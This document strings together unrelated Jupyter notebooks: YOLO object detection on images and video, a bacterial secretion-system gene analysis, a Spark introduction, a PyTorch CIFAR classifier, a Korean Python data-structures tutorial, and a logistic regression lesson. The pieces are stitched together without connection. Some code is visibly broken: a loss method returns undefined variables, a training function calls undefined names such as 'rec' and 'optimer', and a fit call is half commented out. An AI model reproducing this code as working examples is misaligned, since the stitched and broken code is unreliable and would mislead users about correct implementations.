optimizer = Adam(lr=0.1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
#optimizer = SGD(lr=1e-4, decay=0.0005, momentum=0.9)
#optimizer = RMSprop(lr=1e-4, rho=0.9, epsilon=1e-08, decay=0.0)
model.load_weights("wednesday2.h5")
model.compile(loss=custom_loss, optimizer=optimizer)
#history = model.fit_generator(generator = train_batch,
steps_per_epoch = len(train_batch),
epochs = 100,
verbose = 1,
validation_data = valid_batch,
validation_steps = len(valid_batch),
callbacks = [early_stop, checkpoint, tensorboard],
max_queue_size = 3)
#print(history.history.keys())
# summarize history for accuracy
#plt.plot(history.history['loss'])
#plt.plot(history.history['val_loss'])
#plt.title('model loss')
#plt.ylabel('loss')
#plt.xlabel('epoch')
#plt.legend(['train', 'test'], loc='upper left')
#plt.show()
```
# Perform detection on image
```
model.load_weights("best_weights.h5")
image = cv2.imread('train_image_folder/00001018.jpg')
dummy_array = np.zeros((1,1,1,1,TRUE_BOX_BUFFER,4))
plt.figure(figsize=(10,10))
input_image = cv2.resize(image, (416, 416))
input_image = input_image / 255.
input_image = input_image[:,:,::-1]
input_image = np.expand_dims(input_image, 0)
netout = model.predict([input_image, dummy_array])
boxes = decode_netout(netout[0],
obj_threshold=0.3,
nms_threshold=NMS_THRESHOLD,
anchors=ANCHORS,
nb_class=CLASS)
image = draw_boxes(image, boxes, labels=LABELS)
plt.imshow(image[:,:,::-1]); plt.show()
```
# Perform detection on video
```
model.load_weights("weights_coco.h5")
dummy_array = np.zeros((1,1,1,1,TRUE_BOX_BUFFER,4))
video_inp = '../basic-yolo-keras/images/phnom_penh.mp4'
video_out = '../basic-yolo-keras/images/phnom_penh_bbox.mp4'
video_reader = cv2.VideoCapture(video_inp)
nb_frames = int(video_reader.get(cv2.CAP_PROP_FRAME_COUNT))
frame_h = int(video_reader.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_w = int(video_reader.get(cv2.CAP_PROP_FRAME_WIDTH))
video_writer = cv2.VideoWriter(video_out,
cv2.VideoWriter_fourcc(*'XVID'),
50.0,
(frame_w, frame_h))
for i in tqdm(range(nb_frames)):
ret, image = video_reader.read()
input_image = cv2.resize(image, (416, 416))
input_image = input_image / 255.
input_image = input_image[:,:,::-1]
input_image = np.expand_dims(input_image, 0)
netout = model.predict([input_image, dummy_array])
boxes = decode_netout(netout[0],
obj_threshold=0.3,
nms_threshold=NMS_THRESHOLD,
anchors=ANCHORS,
nb_class=CLASS)
image = draw_boxes(image, boxes, labels=LABELS)
video_writer.write(np.uint8(image))
video_reader.release()
video_writer.release()
```
|
github_jupyter
|
# Explore secretion system genes
[KEGG enrichment analysis](5_KEGG_enrichment_of_stable_genes.ipynb) found that genes associated with ribosome, Lipopolysaccharide (outer membrane) biosynthesis, citrate cycle are significantly conserved across strains.
Indeed functions that are essential seem to be significantly conserved across strains as expected.
However, there are also pathways like the secretion systems, which allow for inter-strain warfare, that we’d expect to vary across strains but were found to be conserved (T3SS significant but not T6SS).
This notebook examines the stability score of the genes in the secretion systems to determine if there is a subset of the secretion genes, related to the machinery that is conserved while others, like the secretory proteins, are more variable.
```
%load_ext autoreload
%autoreload 2
%matplotlib inline
import os
import random
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from scripts import annotations
random.seed(1)
```
## Load data and metadata
```
# Input similarity scores and annotations filenames
# Since the results are similar we only need to look at the scores for one strain type
pao1_similarity_filename = "pao1_core_similarity_associations_final_spell.tsv"
# Import df
pao1_similarity = pd.read_csv(pao1_similarity_filename, sep="\t", index_col=0, header=0)
pao1_similarity.head()
# Load KEGG pathway data
pao1_pathway_filename = "https://raw.githubusercontent.com/greenelab/adage/7a4eda39d360b224268921dc1f2c14b32788ab16/Node_interpretation/pseudomonas_KEGG_terms.txt"
pao1_pathways = annotations.load_format_KEGG(pao1_pathway_filename)
print(pao1_pathways.shape)
pao1_pathways.head()
```
## Get genes related to secretion pathways
```
pao1_pathways.loc[
[
"KEGG-Module-M00334: Type VI secretion system",
"KEGG-Module-M00332: Type III secretion system",
"KEGG-Module-M00335: Sec (secretion) system",
]
]
# Get genes related to pathways
T6SS_genes = list(pao1_pathways.loc["KEGG-Module-M00334: Type VI secretion system", 2])
T3SS_genes = list(pao1_pathways.loc["KEGG-Module-M00332: Type III secretion system", 2])
secretion_genes = list(
pao1_pathways.loc["KEGG-Module-M00335: Sec (secretion) system", 2]
)
# Pull out genes related to T3SS
T6SS_similarity = pao1_similarity.reindex(T6SS_genes)
T3SS_similarity = pao1_similarity.reindex(T3SS_genes)
sec_similarity = pao1_similarity.reindex(secretion_genes)
T6SS_similarity.sort_values(by="Transcriptional similarity across strains")
T3SS_similarity.sort_values(by="Transcriptional similarity across strains")
# sec_similarity.sort_values(by="Transcriptional similarity across strains")
# Save T3SS and T6SS df for easier lookup
T3SS_similarity.to_csv("T3SS_core_similarity_associations_final_spell.tsv", sep="\t")
T6SS_similarity.to_csv("T6SS_core_similarity_associations_final_spell.tsv", sep="\t")
```
## Plot
```
plt.figure(figsize=(10, 8))
sns.violinplot(
data=pao1_similarity,
x="Transcriptional similarity across strains",
palette="Blues",
inner=None,
)
sns.swarmplot(
data=T6SS_similarity,
x="Transcriptional similarity across strains",
color="k",
label="T6SS genes",
alpha=0.8,
)
sns.swarmplot(
data=T3SS_similarity,
x="Transcriptional similarity across strains",
color="r",
label="T3SS genes",
alpha=0.8,
)
# sns.swarmplot(
# data=sec_similarity,
# x="Transcriptional similarity across strains",
# color="yellow",
# label="secretion system genes",
# alpha=0.8,
# )
# Add text labels for least stable genes amongst the T3SS/T6SS
plt.text(
x=T3SS_similarity.loc[
T3SS_similarity["Name"] == "pscR", "Transcriptional similarity across strains"
],
y=0.02,
s="$pscR$",
)
plt.text(
x=T6SS_similarity.loc[
T6SS_similarity["Name"] == "vgrG6", "Transcriptional similarity across strains"
],
y=-0.02,
s="$vgrG6$",
)
plt.text(
x=T6SS_similarity.loc[
T6SS_similarity["Name"] == "vgrG3", "Transcriptional similarity across strains"
],
y=-0.02,
s="$vgrG3$",
)
plt.text(
x=T6SS_similarity.loc[
T6SS_similarity["Name"] == "vgrG4a", "Transcriptional similarity across strains"
],
y=-0.02,
s="$vgrG4a$",
)
plt.title("Stability of secretion system genes", fontsize=14)
plt.legend()
```
We hypothesized that most secretion machinery genes would be conserved but that secreted proteins (i.e. effector proteins) would be less conserved. In general, the effector proteins were not included in the KEGG annotations, which is probably why these secretion systems were found to be highly stable.
T6SS genes are among the most stable with the vgrG6, vgrG3, vgrG4a among the least stable. T3SS among the most stable with pscR among the least stable
Need to read more about these genes and if it makes sense that they are at the bottom.
|
github_jupyter
|
## Launching Spark
Spark's Python console can be launched directly from the command line by `pyspark`. SparkSession can be found by calling `spark` object. The Spark SQL console can be launced by `spark-sql`. We will experiment with these in the upcoming sessions.
If we have `pyspark` and other required packages installed we can also launch a SparkSession from a Python notebook environment. In order to do this we need to import the package `pyspark`.
Databrick and Google Dataproc notebooks already have pyspark installed and we can simply access the SparkSession by calling `spark` object.
## The SparkSession
You control your Spark Application through a driver process called the SparkSession. The SparkSession instance is the way Spark executes user-defined manipulations across the cluster. There is a one-to-one correspondence between a SparkSession and a Spark Application. In Scala and Python, the variable is available as `spark` when you start the console. Let’s go ahead and look at the SparkSession:
```
spark
```
<img src="https://github.com/soltaniehha/Big-Data-Analytics-for-Business/blob/master/figs/04-02-SparkSession-JVM.png?raw=true" width="700" align="center"/>
## Transformations
Let’s now perform the simple task of creating a range of numbers. This range of numbers is just like a named column in a spreadsheet:
```
myRange = spark.range(1000).toDF("number")
```
We created a DataFrame with one column containing 1,000 rows with values from 0 to 999. This range of numbers represents a distributed collection. When run on a cluster, each part of this range of numbers exists on a different executor. This is a Spark DataFrame.
```
myRange
```
Calling `myRange` will not return anything but the object behind it. It is because we haven't materialized the recipe for creating the DataFrame that we just created.
Core data structures in Spark are immutable, meaning they cannot be changed after they’re created.
To “change” a DataFrame, you need to instruct Spark how you would like to modify it to do what you want.
These instructions are called **transformations**. Transformations are lazy operations, meaning that they won’t do any computation or return any output until they are asked to by an action.
Let’s perform a simple transformation to find all even numbers in our current DataFrame:
```
divisBy2 = myRange.where("number % 2 = 0")
divisBy2
```
The "where" statement specifies a narrow dependency, where only one partition contributes to at most one output partition. Transformations are the core of how you express your business logic using Spark. Spark will not act on transformations until we call an **action**.
### Lazy Evaluation
Lazy evaulation means that Spark will wait until the very last moment to execute the graph of computation instructions. In Spark, instead of modifying the data immediately when you express some operation, you build up a plan of transformations that you would like to apply to your source data. By waiting until the last minute to execute the code, Spark compiles this plan from your raw DataFrame transformations to a streamlined physical plan that will run as efficiently as possible across the cluster. This provides immense benefits because Spark can optimize the entire data flow from end to end. An example of this is something called predicate pushdown on DataFrames. If we build a large Spark job but specify a filter at the end that only requires us to fetch one row from our source data, the most efficient way to execute this is to access the single record that we need. Spark will actually optimize this for us by pushing the filter down automatically.
## Actions
Transformations allow us to build up our logical transformation plan. To trigger the computation, we run an action. An action instructs Spark to compute a result from a series of transformations. The simplest action is count, which gives us the total number of records in the DataFrame:
```
divisBy2.count()
```
There are three kinds of actions:
* Actions to view data in the console
* Actions to collect data to native objects in the respective language
* Actions to write to output data sources
|
github_jupyter
|
```
import torch
import math
import torch.nn as nn
import torch.optim as optim
import torch.utils
import PIL
from matplotlib import pyplot as plt
from PIL import Image
from torchvision import transforms
from torchvision import datasets
#Downloading CIFAR-10
data_path = '../data-unversioned/p1ch7/'
cifar10 = datasets.CIFAR10(data_path, train=True, download=True)
cifar10_val = datasets.CIFAR10(data_path, train=False, download=True) #下载太慢请开代理
# 引入normalize的数据初始化
tensor_cifar10_normalize_train = datasets.CIFAR10(data_path, train=True, download=False,
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4915, 0.4823, 0.4468),
(0.2470, 0.2435, 0.2616))
]))
tensor_cifar10_normalize_val = datasets.CIFAR10(data_path, train=True, download=False,
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4915, 0.4823, 0.4468),
(0.2470, 0.2435, 0.2616))
]))
# Build the dataset and DataLoader
label_map = {0: 0, 2: 1} # 占位符
class_names = ['airplane', 'bird']
# 训练集
cifar2 = [(img, label_map[label])
for img, label in tensor_cifar10_normalize_train
if label in [0, 2]]
# 验证集
cifar2_val = [(img, label_map[label])
for img, label in tensor_cifar10_normalize_val
if label in [0, 2]]
train_loader = torch.utils.data.DataLoader(cifar2, batch_size=64, shuffle=True)
class Animator: #@save
"""在动画中绘制数据。"""
def __init__(self, xlabel=None, ylabel=None, legend=None, xlim=None,
ylim=None, xscale='linear', yscale='linear',
fmts=('-', 'm--', 'g-.', 'r:'), nrows=1, ncols=1,
figsize=(3.5, 2.5)):
# 增量地绘制多条线
if legend is None:
legend = []
d2l.use_svg_display()
self.fig, self.axes = d2l.plt.subplots(nrows, ncols, figsize=figsize)
if nrows * ncols == 1:
self.axes = [self.axes, ]
# 使用lambda函数捕获参数
self.config_axes = lambda: d2l.set_axes(
self.axes[0], xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
self.X, self.Y, self.fmts = None, None, fmts
def add(self, x, y):
# 向图表中添加多个数据点
if not hasattr(y, "__len__"):
y = [y]
n = len(y)
if not hasattr(x, "__len__"):
x = [x] * n
if not self.X:
self.X = [[] for _ in range(n)]
if not self.Y:
self.Y = [[] for _ in range(n)]
for i, (a, b) in enumerate(zip(x, y)):
if a is not None and b is not None:
self.X[i].append(a)
self.Y[i].append(b)
self.axes[0].cla()
for x, y, fmt in zip(self.X, self.Y, self.fmts):
self.axes[0].plot(x, y, fmt)
self.config_axes()
display.display(self.fig)
display.clear_output(wait=True)
device = torch.device('cuda:0')
model_F3 = nn.Sequential(
nn.Linear(3072, 512),
nn.Tanh(),
nn.Linear(512, 2),
nn.LogSoftmax(dim=1))
model_F3.to(device)
lr = 1e-2
optimizer = optim.SGD(model_F3.parameters(),lr =lr)
loss_fn = nn.NLLLoss()
n_epochs = 100
for epoch in range(n_epochs):
for imgs, labels in train_loader:
imgs, labels = imgs.to(device), labels.to(device)
batch_size = imgs.shape[0]
outputs = model_F3(imgs.view(batch_size, -1))
loss = loss_fn(outputs, labels)
#out = model_F3(img.view(-1).unsqueeze(0)).to(device)
#loss = loss_fn(out,torch.tensor([label]))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print("Epoch: %d, Loss: %f" % (epoch, float(loss)))
class model_chap7(nn.Module):
def __init__(self, config):
super(model_chap7, self).__init__()
#self._num_users = config['num_users']
#self._num_items = config['num_items']
#self._hidden_units = config['hidden_units']
#self._lambda_value = config['lambda']
self._config = config
def forward(self,torch_input):
encoder = self.encoder(torch_input)
decoder = self.decoder(encoder)
return decoder
def loss(self,decoder,input,optimizer,mask_input):
loss_fn = nn.NLLLoss()
return cost,rmse
class NetWidth(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(32, 16, kernel_size=3, padding=1)
self.fc1 = nn.Linear(16 * 8 * 8, 32)
self.fc2 = nn.Linear(32, 2)
def forward(self, x):
out = F.max_pool2d(torch.tanh(self.conv1(x)), 2)
out = F.max_pool2d(torch.tanh(self.conv2(out)), 2)
out = out.view(-1, 16 * 8 * 8)
out = torch.tanh(self.fc1(out))
out = self.fc2(out)
return out
autorec_config = \
{
'train_ratio': 0.9,
'num_epoch': 100,
'batch_size': 100,
'optimizer': 'SGD',
'adam_lr': 1e-2,
'lambda': 1,
'device_id': 2,
'use_cuda': True,
'model_name': 'model_chap7'
}
# 实例化AutoRec对象
model = model_chap7(autorec_config)
'''Train'''
def train(epoch):
loss = 0
for step, (batch_x, batch_y) in enumerate(train_loader):
batch_x = batch_x.type(torch.FloatTensor)
decoder = rec(batch_x) # 第一步,数据的前向传播,计算预测值
loss, rmse = rec.loss(decoder=decoder, input=batch_x, optimizer=optimer, mask_input=batch_mask_x) # 第二步,计算误差
optimer.zero_grad() # 反向传播前,梯度归零
loss.backward() # 第三步,反向传播
optimer.step() # 一步更新所有参数
cost_all += loss
RMSE += rmse
RMSE = np.sqrt(RMSE.detach().cpu().numpy() / (train_mask_r == 1).sum())
animator.add(epoch + 1, RMSE)
```
|
github_jupyter
|
2018-10-26
실용주의 파이썬 101 - Part 2
[김영호](https://www.linkedin.com/in/danielyounghokim/)
난이도 ● ● ◐ ○ ○
# Data Structures
- Immutable vs. Mutable
- Immutable: `tuple`
- Mutable: `list`, `set`, `dict`
- Mutable Container 설명 순서
- 초기화
- 추가/삭제
- 특정 값 접근(access)
- 정렬
## `tuple`
### 초기화
```
seq = ()
type(seq)
seq = (1, 2, 3)
seq
```
### 크기 확인
```
len(seq)
```
화면에 `(`와 `)`로 묶여 구분자 `,`와 함께 표시됩니다.
```
type(seq)
```
변수형이 달라도 됩니다.
```
('월', 10, '일', 26)
```
### 접근
```
seq[0]
```
### Immutability
`tuple`로 정의한 것은 바꾸지 못합니다(immutable).
```
seq[0] = 4
```
### 분배
```
fruits_tuple = ('orange', 'apple', 'banana')
fruit1, fruit2, fruit3 = fruits_tuple
print(fruit1)
print(fruit2)
print(fruit3)
```
## `list`
- 정말 많이 쓰기 때문에 굉장히 중요한 자료 구조
### 초기화
```
temp_list = []
type(temp_list)
temp_list = [1, 'a', 3.4]
temp_list
```
#### `list` of `tuple`s
```
temp_list = [
('김 책임', '남'),
('박 선임', '여'),
('이 수석', '남', 15),
('최 책임', '여')
]
```
`tuple` 길이가 달라도 됩니다.
#### `list` of `list`s
```
temp_list = [
['김 책임', '남'],
['박 선임', '여'],
['이 수석', '남', 15],
['최 책임', '여']
]
```
각 `list` 크기가 달라도 됩니다.
`list` of `tuple`s 를 `list` of `list`s 로 쉽게 바꾸는 법?
- Part 3 에서 다룹니다.
#### 동일한 값을 특정 개수만큼 초기화
```
temp_list = [0] * 10
temp_list
```
### 크기 확인
```
len(temp_list)
```
### 분배
```
fruits_list = ['orange', 'apple', 'banana']
fruit1, fruit2, fruit3 = fruits_list
print(fruit1)
print(fruit2)
print(fruit3)
```
### 추가
```
temp_list = []
temp_list.append('김 책임')
temp_list.append('이 수석')
temp_list
```
특정 위치에 추가
```
temp_list
temp_list.insert(1, '박 선임')
temp_list
```
### 삭제
- ~~전 별로 안 씀~~
`remove(x)`는 `list`에서 첫 번째로 나오는 x를 삭제
```
l = ['a', 'b', 'c', 'd', 'b']
l.remove('b')
l
```
한 번에 `b`를 다 지우는 방법은?
- Part 3 에서 해봅시다.
### 특정 값 접근(Access) & 변경
- 그냥 Array 라고 생각하면 편합니다.
- Index는 0부터 시작
```
nums = [1, 2, 3, 4, 5]
nums[2] = 6
nums
```
#### slicing
```
nums = [1, 2, 3, 4, 5] # range는 파이썬에 구현되어 있는 함수이며 정수들로 구성된 리스트를 만듭니다
print(nums) # 출력 "[0, 1, 2, 3, 4]"
print(nums[2:4]) # 인덱스 2에서 4(제외)까지 슬라이싱; 출력 "[2, 3]"
print(nums[2:]) # 인덱스 2에서 끝까지 슬라이싱; 출력 "[2, 3, 4]"
print(nums[:2]) # 처음부터 인덱스 2(제외)까지 슬라이싱; 출력 "[0, 1]"
print(nums[:]) # 전체 리스트 슬라이싱; 출력 ["0, 1, 2, 3, 4]"
print(nums[:-1]) # 슬라이싱 인덱스는 음수도 가능; 출력 ["0, 1, 2, 3]"
nums[2:4] = [8, 9] # 슬라이스된 리스트에 새로운 리스트 할당
print(nums) # 출력 "[0, 1, 8, 9, 4]"
```
#### Slicing & Changing
```
nums = [1, 2, 3, 4, 5]
nums[1:3] = [6, 7]
nums
```
### 기타 등등: 뒤집기, ...
```
nums = [1, 2, 3, 4, 5]
nums[::-1]
```
홀수 index 만 순방향으로 access
```
nums[::2]
```
역방향으로 홀수 index만 access
```
nums[::-2]
```
### 정렬
- `sorted` 라는 내장 함수 사용
- `.sort()` → inplace
```
temp_list = [3, 2, 5, 8, 1, 7]
sorted(temp_list)
sorted(temp_list, reverse = True)
```
### 특정 값 존재 여부
```
temp_list = ['김 책임', '박 선임', '이 수석']
'김 책임' in temp_list
'이 선임' in temp_list
```
### `list` ↔ `tuple`
```
temp_list = [1, 2, 3, 4, 5]
tuple(temp_list)
type(tuple(temp_list))
```
### `str` & `list`
#### `split()`: 문자열 분리(tokenization)
```
multi_line_str = '''
이름: 김영호
직급: 책임컨설턴트
소속: 데이터분석그룹
'''
print(multi_line_str)
multi_line_str
multi_line_str.strip()
multi_line_str.strip().split('\n')
```
#### `str` 쪼개기
```
tokens = multi_line_str.strip().split('\n')
tokens
```
#### 여러 `str` 합치기
```
'\n'.join(tokens)
```
### 여러 `list` 합치기
```
l1 = [1, 2, 3, 4, 5]
l2 = ['a', 'b', 'c']
l3 = ['*', '!', '%', '$']
# BETTER (Python 2.7+)
[*l1, *l2, *l3]
# For (Python 2.6-)
l = []
l.extend(l1)
l.extend(l2)
l.extend(l3)
l
```
## `set`
- 용도: 중복 제거
### 초기화
```
temp_set = set()
type(temp_set)
```
`tuple`을 넣어서 초기화 할 수도 있습니다.
```
temp_set = set((1, 2, 1, 3))
temp_set
```
중복이 제거된 것에 주목하세요. `{`와 `}` 사이에 값은 `,`로 구분되어 표시됩니다.
`list`도 넣어서 초기화 할 수 있습니다.
```
temp_set = set([1, 2, 1, 3])
```
아래와 같이 초기화 할 수도 있습니다.
```
temp_set = {1, 2, 1, 3}
type(temp_set)
```
### 크기 확인
```
len(temp_set)
```
### 추가
```
temp_set = set([1, 2])
temp_set.add(1)
temp_set
```
여러개의 값 한번에 추가하기
```
temp_set.update([2, 3, 4])
temp_set
```
### 삭제
```
temp_set = set([1, 2, 3])
temp_set.remove(2)
temp_set
```
### 특정 값 접근
- Random access 안 됨
### 특정 값 존재 여부
```
temp_set = set(['김 책임', '박 선임', '이 수석'])
'김 책임' in temp_set
'김 책임님' in temp_set
```
### 연산
- 참조: https://github.com/brennerm/PyTricks/blob/master/setoperators.py
#### 합집합: Union
```
food_set1 = {'짬뽕', '파스타', '쌀국수'}
food_set2 = {'짬뽕', '탕수육', '볶음밥'}
food_set1.union(food_set2)
```
#### 교집합: Intersection
```
food_set1.intersection(food_set2)
```
#### 차집합: Difference
```
food_set1.difference(food_set2)
```
비교해서 겹치는 것을 제외합니다.
### `list` ↔ `set`
- `list` 안에 immutable object 들만 있을 때 가능
## `dict`
- 이것도 정말 많이 쓰는 핵심적인 자료 구조
- **`key`와 `value`의 쌍들**이 들어감
- `key`
- immutable 만 가능
- 중복 불가
- `value`
- mutable 도 가능
### 초기화
```
temp_dict = {}
type(temp_dict)
temp_dict = {
'이름' : '김영호',
'사업부' : 'IT혁신사업부',
'소속' : '데이터분석그룹'
}
```
### 크기 확인
```
len(temp_dict)
```
### 추가
```
temp_dict = {}
temp_dict['근속연차'] = 3
temp_dict['근속연차'] += 1
temp_dict['근속연차']
temp_dict['좋아하는 음식'] = set()
temp_dict['좋아하는 음식']
temp_dict['좋아하는 음식'].add('짬뽕')
temp_dict['좋아하는 음식'].add('파스타')
temp_dict['좋아하는 음식'].add('쌀국수')
temp_dict['좋아하는 음식']
```
Key 가 없을 때 `dict`를 효율적으로 다루는 방법
- Standard Library 시간에 다룹니다.
### 삭제
- ~~삭제는 별로 안 씀~~
### 특정 Key 접근
```
temp_dict = {
'김 책임' : '남',
'박 선임' : '여',
'이 수석' : '남',
'최 책임' : '여'
}
temp_dict['김 책임']
```
Key 가 없을 떄?
```
temp_dict['양 책임']
```
에러 납니다.
오류/예외 처리는?
```
temp_dict.get('양 책임')
temp_dict.get('양 책임', '키 없음')
```
### 특정 `key` 존재 여부
```
temp_dict = {
'김 책임' : '남',
'박 선임' : '여',
'이 수석' : '남',
'최 책임' : '여'
}
'김 책임' in temp_dict
```
### `list` of `tuple`s → `dict`
```
list_of_tuples = [
('김 책임', 'M+'),
('박 선임', 'M'),
('이 수석', 'E')
]
d1 = dict(list_of_tuples)
d1
l1 = ['김 책임', '박 선임', '이 수석']
l2 = ['M+', 'M', 'E']
d2 = dict(zip(l1, l2))
d2
d1 == d2
```
### 여러 `dict` 합치기
```
d1 = {
'김선임' : 'M+',
'박선임' : 'M',
'이수석' : 'E'
}
d2 = {
'Apple' : 'Red',
'Banana' : 'Yellow'
}
d3 = {
'ABC' : 'DEF',
'GHI' : 'JKL'
}
d = {**d1, **d2, **d3}
d
```
### More on string formatting
```
temp_dict = {
'name' : '김영호',
'affiliation' : '삼성SDS',
}
formatted_string = '''
이름: {name}
소속: {affiliation}
'''.format(**temp_dict)
formatted_string
```
Part 2 끝
참조
- https://docs.python.org/ko/3/contents.html
- https://docs.python.org/ko/3/tutorial/index.html
- https://docs.python.org/3.7/howto/
- http://cs231n.github.io/python-numpy-tutorial/
- [점프 투 파이썬](https://wikidocs.net/book/1)
- https://docs.python-guide.org/
|
github_jupyter
|
# Logistic Regression
Notebook version: 2.0 (Nov 21, 2017)
2.1 (Oct 19, 2018)
Author: Jesús Cid Sueiro (jcid@tsc.uc3m.es)
Jerónimo Arenas García (jarenas@tsc.uc3m.es)
Changes: v.1.0 - First version
v.1.1 - Typo correction. Prepared for slide presentation
v.2.0 - Prepared for Python 3.0 (backcompmatible with 2.7)
Assumptions for regression model modified
v.2.1 - Minor changes regarding notation and assumptions
```
from __future__ import print_function
# To visualize plots in the notebook
%matplotlib inline
# Imported libraries
import csv
import random
import matplotlib
import matplotlib.pyplot as plt
import pylab
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from sklearn.preprocessing import PolynomialFeatures
from sklearn import linear_model
```
# Logistic Regression
## 1. Introduction
### 1.1. Binary classification and decision theory. The MAP criterion
The goal of a classification problem is to assign a *class* or *category* to every *instance* or *observation* of a data collection. Here, we will assume that every instance ${\bf x}$ is an $N$-dimensional vector in $\mathbb{R}^N$, and that the class $y$ of sample ${\bf x}$ is an element of a binary set ${\mathcal Y} = \{0, 1\}$. The goal of a classifier is to predict the true value of $y$ after observing ${\bf x}$.
We will denote as $\hat{y}$ the classifier output or *decision*. If $y=\hat{y}$, the decision is a *hit*, otherwise $y\neq \hat{y}$ and the decision is an *error*.
Decision theory provides a solution to the classification problem in situations where the relation between instance ${\bf x}$ and its class $y$ is given by a known probabilistic model: assume that every tuple $({\bf x}, y)$ is an outcome of a random vector $({\bf X}, Y)$ with joint distribution $p_{{\bf X},Y}({\bf x}, y)$. A natural criteria for classification is to select predictor $\hat{Y}=f({\bf x})$ in such a way that the probability or error, $P\{\hat{Y} \neq Y\}$ is minimum. Noting that
$$
P\{\hat{Y} \neq Y\} = \int P\{\hat{Y} \neq Y | {\bf x}\} p_{\bf X}({\bf x}) d{\bf x}
$$
the optimal decision is got if, for every sample ${\bf x}$, we make decision minimizing the conditional error probability:
\begin{align}
\hat{y}^* &= \arg\min_{\hat{y}} P\{\hat{y} \neq Y |{\bf x}\} \\
&= \arg\max_{\hat{y}} P\{\hat{y} = Y |{\bf x}\} \\
\end{align}
Thus, the optimal decision rule can be expressed as
$$
P_{Y|{\bf X}}(1|{\bf x}) \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0}\quad P_{Y|{\bf X}}(0|{\bf x})
$$
or, equivalently
$$
P_{Y|{\bf X}}(1|{\bf x}) \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0}\quad \frac{1}{2}
$$
The classifier implementing this decision rule is usually referred to as the MAP (*Maximum A Posteriori*) classifier. As we have seen, the MAP classifier minimizes the error probability for binary classification, but the result can also be generalized to multiclass classification problems.
### 1.2. Parametric classification.
Classical decision theory is grounded on the assumption that the probabilistic model relating the observed sample ${\bf X}$ and the true hypothesis $Y$ is known. Unfortunately, this is unrealistic in many applications, where the only available information to construct the classifier is a dataset $\mathcal D = \{{\bf x}^{(k)}, y^{(k)}\}_{k=0}^{K-1}$ of instances and their respective class labels.
A more realistic formulation of the classification problem is the following: given a dataset $\mathcal D = \{({\bf x}^{(k)}, y^{(k)}) \in {\mathbb{R}}^N \times {\mathcal Y}, \, k=0,\ldots,{K-1}\}$ of independent and identically distributed (i.i.d.) samples from an ***unknown*** distribution $p_{{\bf X},Y}({\bf x}, y)$, predict the class $y$ of a new sample ${\bf x}$ with the minimum probability of error.
Since the probabilistic model generating the data is unknown, the MAP decision rule cannot be applied. However, many classification algorithms use the dataset to obtain an estimate of the posterior class probabilities, and apply it to implement an approximation to the MAP decision maker.
Parametric classifiers based on this idea assume, additionally, that the posterior class probabilty satisfies some parametric formula:
$$
P_{Y|X}(1|{\bf x},{\bf w}) = f_{\bf w}({\bf x})
$$
where ${\bf w}$ is a vector of parameters. Given the expression of the MAP decision maker, classification consists in comparing the value of $f_{\bf w}({\bf x})$ with the threshold $\frac{1}{2}$, and each parameter vector would be associated to a different decision maker.
In practice, the dataset ${\mathcal D}$ is used to select a particular parameter vector $\hat{\bf w}$ according to certain criterion. Accordingly, the decision rule becomes
$$
f_{\hat{\bf w}}({\bf x}) \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0}\quad \frac{1}{2}
$$
In this lesson, we explore one of the most popular model-based parametric classification methods: **logistic regression**.
<img src="./figs/parametric_decision.png" width=400>
## 2. Logistic regression.
### 2.1. The logistic function
The logistic regression model assumes that the binary class label $Y \in \{0,1\}$ of observation $X\in \mathbb{R}^N$ satisfies the expression.
$$P_{Y|{\bf X}}(1|{\bf x}, {\bf w}) = g({\bf w}^\intercal{\bf x})$$
$$P_{Y|{\bf,X}}(0|{\bf x}, {\bf w}) = 1-g({\bf w}^\intercal{\bf x})$$
where ${\bf w}$ is a parameter vector and $g(·)$ is the *logistic* function, which is defined by
$$g(t) = \frac{1}{1+\exp(-t)}$$
It is straightforward to see that the logistic function has the following properties:
- **P1**: Probabilistic output: $\quad 0 \le g(t) \le 1$
- **P2**: Symmetry: $\quad g(-t) = 1-g(t)$
- **P3**: Monotonicity: $\quad g'(t) = g(t)·[1-g(t)] \ge 0$
In the following we define a logistic function in python, and use it to plot a graphical representation.
**Exercise 1**: Verify properties P2 and P3.
**Exercise 2**: Implement a function to compute the logistic function, and use it to plot such function in the inverval $[-6,6]$.
```
# Define the logistic function
def logistic(t):
#<SOL>
#</SOL>
# Plot the logistic function
t = np.arange(-6, 6, 0.1)
z = logistic(t)
plt.plot(t, z)
plt.xlabel('$t$', fontsize=14)
plt.ylabel('$g(t)$', fontsize=14)
plt.title('The logistic function')
plt.grid()
```
### 2.2. Classifiers based on the logistic model.
The MAP classifier under a logistic model will have the form
$$P_{Y|{\bf X}}(1|{\bf x}, {\bf w}) = g({\bf w}^\intercal{\bf x}) \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0} \quad \frac{1}{2} $$
Therefore
$$
2 \quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0} \quad
1 + \exp(-{\bf w}^\intercal{\bf x}) $$
which is equivalent to
$${\bf w}^\intercal{\bf x}
\quad\mathop{\gtrless}^{\hat{y}=1}_{\hat{y}=0}\quad
0 $$
Therefore, the classifiers based on the logistic model are given by linear decision boundaries passing through the origin, ${\bf x} = {\bf 0}$.
```
# Weight vector:
w = [4, 8] # Try different weights
# Create a rectangular grid.
x_min = -1
x_max = 1
dx = x_max - x_min
h = float(dx) / 200
xgrid = np.arange(x_min, x_max, h)
xx0, xx1 = np.meshgrid(xgrid, xgrid)
# Compute the logistic map for the given weights
Z = logistic(w[0]*xx0 + w[1]*xx1)
# Plot the logistic map
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.plot_surface(xx0, xx1, Z, cmap=plt.cm.copper)
ax.contour(xx0, xx1, Z, levels=[0.5], colors='b', linewidths=(3,))
plt.xlabel('$x_0$')
plt.ylabel('$x_1$')
ax.set_zlabel('P(1|x,w)')
plt.show()
```
